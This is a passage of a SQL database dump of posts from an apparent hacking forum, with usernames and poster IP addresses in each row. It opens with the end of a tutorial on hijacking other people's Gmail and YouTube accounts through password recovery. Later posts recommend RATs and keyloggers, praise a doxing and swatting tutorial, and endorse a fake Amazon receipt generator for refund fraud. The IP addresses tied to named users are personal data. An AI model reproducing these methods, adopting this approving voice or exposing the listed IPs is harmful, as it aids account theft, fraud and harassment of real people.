Password Recovery Click on the Link in the Email and Wollllllaaaaah :D You can change the Password. Now you can Log in . And Basically you now have a new Gmail Account and a New YouTube Account :) And if you are Lucky : There will be Emails in the Gmail Account like Steam, Paypal, Alertpay, Porn Websites, Premium Downloading Accounts like Filesonic, Rapidshare, Hotfile, Megaupload, Megavideo, Sharecash .... Thaanks Guys and Enjoy your new Accounts ![/b] Credits: Breezo', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '6a55ea7033d1eba51bbdf67a1cd241f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1276', '227', '920', '13', 'RE: hack twitter?', '0', '5', 'Timmy', '1346190697', 'It\'s hard to hack twitters, but RATs and Keyloggers FTW.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '727592e8db9de7a43ea6bf77fc6784cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1277', '267', '1188', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '1', 't3h jok3r', '1346191552', 'LOL it sure was, thanks for reminding me of my mistake. I removed it. Wait a min, Sin Cara, are you really calling me awful?', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '19ca4a5150552db4122f56b31749199e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1278', '190', '665', '56', 'RE: Copy and paste game', '0', '55', 'Baws', '1346196162', 'http://l33thacking.com/index.php I sent a PM to someone on another forum advertising LH.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'ea56c94dd461d053ebe3dcb1bf5576b1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1279', '238', '1272', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346196222', '[quote=\'t3h jok3r\' pid=\'1272\' dateline=\'1346188896\'] Lmao Banned for having too many reasons to ban each other. [/quote] Banned for trying to ban me.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '28545a0782311b72552df89aec32746a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1280', '276', '0', '4', 'Greetings.', '0', '141', 'Bane™', '1346197263', '[align=center]Hello everyone, I am new here and I am in times of need so hopefully I will make some money from the methods I learn here. I appreciate the opportunity to learn.[/align]', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '623faa177736827fe6cb9db0120b9f20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1281', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '141', 'Bane™', '1346197787', 'May I get a copy of this pack, thanks in advance.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', 'bc448ab8503d7f929ae4df118a429a94', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1282', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '141', 'Bane™', '1346198155', 'Very interesting methods here, I thought swatting was more complex then that.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '7a941c189a7f9648ecbc9852c2a5a30c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1283', '125', '313', '29', 'RE: [ebook]How to talk to a Police Officer when in trouble[Whitehat]', '0', '141', 'Bane™', '1346198291', 'Nice share! Thank you, couldn\'t hurt to read :P', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '630486c717278f1fdbf91b3362de3a49', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1284', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '141', 'Bane™', '1346198466', 'The forum seems to be at its starting point right now, I\'m sure it will flourish. Other then that some pretty use full things have come out of it.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', 'ad54f8d0765d045e672a9538c6f9d4f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1285', '112', '1281', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1346202358', '[quote=\'Bane™\' pid=\'1281\' dateline=\'1346197787\'] May I get a copy of this pack, thanks in advance. [/quote] PPD ebooks pack is sent... check your pm now.', '119.154.22.164', '2006587044', '1', '0', '0', '0', '1', '98d77cb85de7a29e25dcef41434ceb62', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1286', '276', '1280', '4', 'RE: Greetings.', '0', '82', 'iTzIpod', '1346203064', 'Welcome Bane™ to L33thacking.com If you have any questions, feel free to PM me. I will answer them. Enjoy your stay here!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'debb132c7a10f9fe9f5d82deaa8a4362', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1287', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346203110', 'Banned for breaking the rules.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c062905a559494b5f001089281c6b8a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1288', '267', '1277', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '82', 'iTzIpod', '1346204523', '[quote=\'t3h jok3r\' pid=\'1277\' dateline=\'1346191552\'] LOL it sure was, thanks for reminding me of my mistake. I removed it. Wait a min, Sin Cara, are you really calling me awful? [/quote] If you read his post, I can\'t really tell if he said/meant it sucks or it\'s good due to his grammar. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '85094e57b4ad8184c50e27bfd74039a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1289', '255', '1121', '5', 'RE: IMPORTANT!!!', '0', '20', 'JakeUS', '1346204538', 'Maybe a cool green color?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'd0efd1e1be2027ae9851bdb406f122f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1290', '265', '1184', '3', 'RE: Apathy Demoted', '0', '61', 'NXK', '1346206387', 'To much drama, I don\'t like this. you all need to get along.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '2f3b8d5e72ae4a199375bdca0cb91843', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1291', '235', '1271', '48', 'RE: Experiences of MOD', '0', '82', 'iTzIpod', '1346206390', '[quote=\'NXK\' pid=\'1271\' dateline=\'1346188889\'] [quote=\'t3h jok3r\' pid=\'1268\' dateline=\'1346187759\'] I feel jealous, because your guys username & star color and Userbar match and look beast. [/quote] I think just having the title admin wins bro. [/quote] Couldn\'t agree less. Being an Admin and on this awesome is better than anything in the world. Even owning it is like an awesome dream. I want to be an Admin one day. But chances of that is 0%. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '09b2d9ce3b9e7adc2d9dc1a3e65b2058', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1292', '262', '1171', '43', 'RE: Amazon Receipt Generator V.2', '0', '61', 'NXK', '1346206558', 'I used this to S.E my new keyboard, Worked Flawlessly. If you\'re trying to s.e anything on amazon use this.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'b9905487112f470ed8d4d17242712de1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1293', '265', '1290', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346207418', '[quote=\'NXK\' pid=\'1290\' dateline=\'1346206387\'] To much drama, I don\'t like this. you all need to get along. [/quote] I would not want or will get along with Apathy. I have several reasons why.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8a4a48b639d22aea62183e83e402a5a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1294', '238', '1021', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346209137', 'Banned for not specifying the reason.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'eee00f3b6ffbb46453ab13d29366130c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1295', '248', '1252', '16', 'RE: [Free] [EBook] How to SE a 3DS', '0', '82', 'iTzIpod', '1346209673', '[quote=\'@SSASIN\' pid=\'1252\' dateline=\'1346176198\'] Going to be trying this as we speak. Hope i can SE dem [/quote] Good luck. (:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '10ce9eb40185ba5ff608bce7851fa080', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1296', '275', '1275', '12', 'RE: [???]Hack Tons of YouTube Accounts. No Keylogging etc.[???]', '0', '82', 'iTzIpod', '1346210074', 'Looks promising. I will try this tomorrow (: since I am on a Mobile right now. And it is 11:14 PM. I gotta sleep soon.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8e8783cfa13088f580252b1a02f106d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1297', '262', '1292', '43', 'RE: Amazon Receipt Generator V.2', '0', '82', 'iTzIpod', '1346210326', '[quote=\'NXK\' pid=\'1292\' dateline=\'1346206558\'] I used this to S.E my new keyboard, Worked Flawlessly. If you\'re trying to s.e anything on amazon use this. [/quote] I love SEing from Amazon. Just that their Customer Support isn\'t really good. And they type really slow. And they don\'t budge easily.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b7b360e8e95b337d1358301df67c51d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1298', '273', '1249', '59', 'RE: ????Free Spreading Complete Ebook????', '0', '82', 'iTzIpod', '1346210928', 'Hey dude, I appreciate what you\'re doing to contribute to L33thacking.com Thanks for doing so. And may I have the download link please? Thanks in advance.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'efff28f28086e7dc2f555081edd68225', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1299', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1346211516', 'Baws, please stick to the rules. You cannot post more than 3 times a day per thread in this section. OT: -- N/A I didn\'t Copy & Paste.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2b1cf3d2b000287e9d4738605d10178e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1300', '238', '1294', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346211782', '[quote=\'Baws\' pid=\'1294\' dateline=\'1346209137\'] Banned for not specifying the reason. [/quote] You can only post 3 times a day on threads in this section.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '63825b83bc512ea0d50afb7c0dcb0486', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1301', '265', '1184', '3', 'RE: Apathy Demoted', '0', '141', 'Bane™', '1346217490', 'Here I was thinking that this was the apathy form HF. He is no were near as HQ as the real apathy.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', 'cf378ae1b4ed22fa1b367b2e006909a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1302', '238', '1300', '56', 'RE: Ban the user above you', '0', '141', 'Bane™', '1346218288', '[quote=\'iTzIpod\' pid=\'1300\' dateline=\'1346211782\'] [quote=\'Baws\' pid=\'1294\' dateline=\'1346209137\'] Banned for not specifying the reason. [/quote] You can only post 3 times a day on threads in this section. [/quote] Ban for being an award whore.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '4c790c1a108b50f9a721410b96b0cea3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1303', '238', '1302', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346221365', '[quote=\'Bane™\' pid=\'1302\' dateline=\'1346218288\'] [quote=\'iTzIpod\' pid=\'1300\' dateline=\'1346211782\'] [quote=\'Baws\' pid=\'1294\' dateline=\'1346209137\'] Banned for not specifying the reason. [/quote] You can only post 3 times a day on threads in this section. [/quote] Ban for being an award whore. [/quote] Banned for putting \"ban\" instead of \"banned.\"', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'ab2dc65c6ede6ce65a134e2f4aa2b664', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1304', '277', '0', '11', 'Any phreaking tutorials?', '0', '141', 'Bane™', '1346221819', 'I have a rooted android, and I want to get the most out of it. I was curious if anyone knew any advanced methods on phreaker/PDA hacking.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', 'c87892961efffefac680c7e876b2051d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1305', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346251955', 'Banned for having 10 rep.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ac9a3593c374cbb857a53308f378d2e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1306', '267', '1288', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '1', 't3h jok3r', '1346251998', '[quote=\'iTzIpod\' pid=\'1288\' dateline=\'1346204523\'] [quote=\'t3h jok3r\' pid=\'1277\' dateline=\'1346191552\'] LOL it sure was, thanks for reminding me of my mistake. I removed it. Wait a min, Sin Cara, are you really calling me awful? [/quote] If you read his post, I can\'t really tell if he said/meant it sucks or it\'s good due to his grammar. :/ [/quote] Ehh, Doesn\'t really matter as I gave it a try :D', '41.151.175.208', '697806800', '1', '0', '0', '0', '1', '2f703aed74b5d7fccf0ecc7b29e555f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1307', '267', '1306', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '82', 'iTzIpod', '1346252213', '[quote=\'t3h jok3r\' pid=\'1306\' dateline=\'1346251998\'] [quote=\'iTzIpod\' pid=\'1288\' dateline=\'1346204523\'] [quote=\'t3h jok3r\' pid=\'1277\' dateline=\'1346191552\'] LOL it sure was, thanks for reminding me of my mistake. I removed it. Wait a min, Sin Cara, are you really calling me awful? [/quote] If you read his post, I can\'t really tell if he said/meant it sucks or it\'s good due to his grammar. :/ [/quote] Ehh, Doesn\'t really matter as I gave it a try :D [/quote] In my opinion, it\'s good. (: Don\'t worry.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9237038c72b7bdee1877738c9dbda200', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1308', '278', '0', '7', 'My first mybb theme [WIP]', '0', '54', 'Sin Cara', '1346252354', 'The theme is not yet complete.... its about 85% complete... Here are some screen shoots: [IMG]http://www.auplod.com/u/dploua1710e.png[/IMG] [IMG]http://www.auplod.com/u/laopdu1710f.png[/IMG] [IMG]http://www.auplod.com/u/poadul17112.png[/IMG] Please comment here.... i m not good in gfx so leave the logo.', '119.154.53.45', '2006594861', '1', '0', '54', '1346252524', '1', '8d445eb9bc29b4cd99aba642d5b6267f', '0', '1346252524'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1310', '278', '1308', '7', 'RE: My first mybb theme [WIP]', '0', '82', 'iTzIpod', '1346252666', 'It\'s alright. Nothing professional or whatever. Good luck on your forum and all though!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a53623d38575814456dbfc8d884c8030', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1343', '286', '0', '3', '[Announcement] Awards and IP Log History Features', '0', '1', 't3h jok3r', '1346270947', 'I have currently removed the awards feature and the IP log history, because the plugins got out-dated and they were causing SQL Errors. I can\'t promise when those features would be back. Sorry but I can\'t afford to keep my website offline the whole day due to a plugin.', '41.174.3.249', '699270137', '1', '0', '0', '0', '1', '706b54f9058ca23ee475a6a0f4bd6f40', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1369', '278', '1308', '7', 'RE: My first mybb theme [WIP]', '0', '1', 't3h jok3r', '1346374143', 'Kinda plain but it required a lot of work. I can understand how hard it is creating a MyBB theme. Anyway, nice work.', '41.174.6.118', '699270774', '1', '0', '0', '0', '1', 'c9f38e5a3528be2e000d66502644e38e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1370', '270', '1367', '7', 'RE: Hi everyone', '0', '61', 'NXK', '1346377149', '[quote=\'Timmy\' pid=\'1367\' dateline=\'1346373289\'] Welcome back to LH. How is your college going? [/quote] Good, I actually start next week. I hope it goes well.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5fb28354384d5bc0e66b9a621972f738', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1312', '191', '666', '15', 'RE: ProDos v1.0', '0', '53', 'sirchamp', '1346253150', 'Whats your problem. Isnt the coder allowed to code it as he likes to?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'ea4ae4593eaa5ef639991847639e8733', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1313', '255', '1121', '5', 'RE: IMPORTANT!!!', '0', '1', 't3h jok3r', '1346253574', 'Nah I left green for Staff. I changed it to Orange.', '41.151.138.31', '697797151', '1', '0', '0', '0', '1', 'debac18c4230deef1390460a967ee8ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1314', '235', '1291', '48', 'RE: Experiences of MOD', '0', '1', 't3h jok3r', '1346253799', '[quote=\'iTzIpod\' pid=\'1291\' dateline=\'1346206390\'] [quote=\'NXK\' pid=\'1271\' dateline=\'1346188889\'] [quote=\'t3h jok3r\' pid=\'1268\' dateline=\'1346187759\'] I feel jealous, because your guys username & star color and Userbar match and look beast. [/quote] I think just having the title admin wins bro. [/quote] Couldn\'t agree less. Being an Admin and on this awesome is better than anything in the world. Even owning it is like an awesome dream. I want to be an Admin one day. But chances of that is 0%. :/ [/quote] Uhh I agree. Every mod has 60% chances so 0% is too less.', '41.151.138.31', '697797151', '1', '0', '0', '0', '1', '5c656c316366252cab39727ad4ce99f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1315', '164', '1284', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1346253816', '[quote=\'Bane™\' pid=\'1284\' dateline=\'1346198466\'] The forum seems to be at its starting point right now, I\'m sure it will flourish. Other then that some pretty use full things have come out of it. [/quote] Thanks, we highly appreciate your comments regarding LH.', '41.151.138.31', '697797151', '1', '0', '0', '0', '1', '9717fb39a686b3471878e624faa73bdf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1316', '125', '313', '29', 'RE: [ebook]How to talk to a Police Officer when in trouble[Whitehat]', '0', '144', 'TheOne™', '1346254192', 'Thank you for this share i will read it later', '86.24.67.92', '1444430684', '0', '0', '0', '0', '1', '7a55ec33834ca5dfdfdb1023559b2e79', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1317', '276', '1280', '4', 'RE: Greetings.', '0', '1', 't3h jok3r', '1346254447', 'Welcome to L33THacking. Good Luck in earning and feel free to check out other sections.', '41.151.138.31', '697797151', '1', '0', '0', '0', '1', '7a68efdc000a0025ee872fe30f61ad13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1318', '277', '1304', '11', 'RE: Any phreaking tutorials?', '0', '61', 'NXK', '1346255675', 'There\'s alot of youtube videos that will show you the best things you can do with a rooted android like over clocking it, things like that.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '6edef58a70f64a9bf9feed85e8f5031d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1319', '247', '1182', '16', 'RE: [Free] [EBook] How to SE Pringles', '0', '61', 'NXK', '1346255819', '[quote=\'iTzIpod\' pid=\'1182\' dateline=\'1346109303\'] For me, I live in Canada so the tab is called Ask Us. And it works from there. But I think Kelloggs now owns Pringles. I didn\'t write this eBook sorry :/ I tried it 3 times and got it to work successfully. Sorry guys. [/quote] My fellow mod is canadian also? and iv always just used astro pid for pringles and told them my package had he airtight seal punctured. Ill give this a read though.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5a2f42e5646867886bc2faef44e936e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, 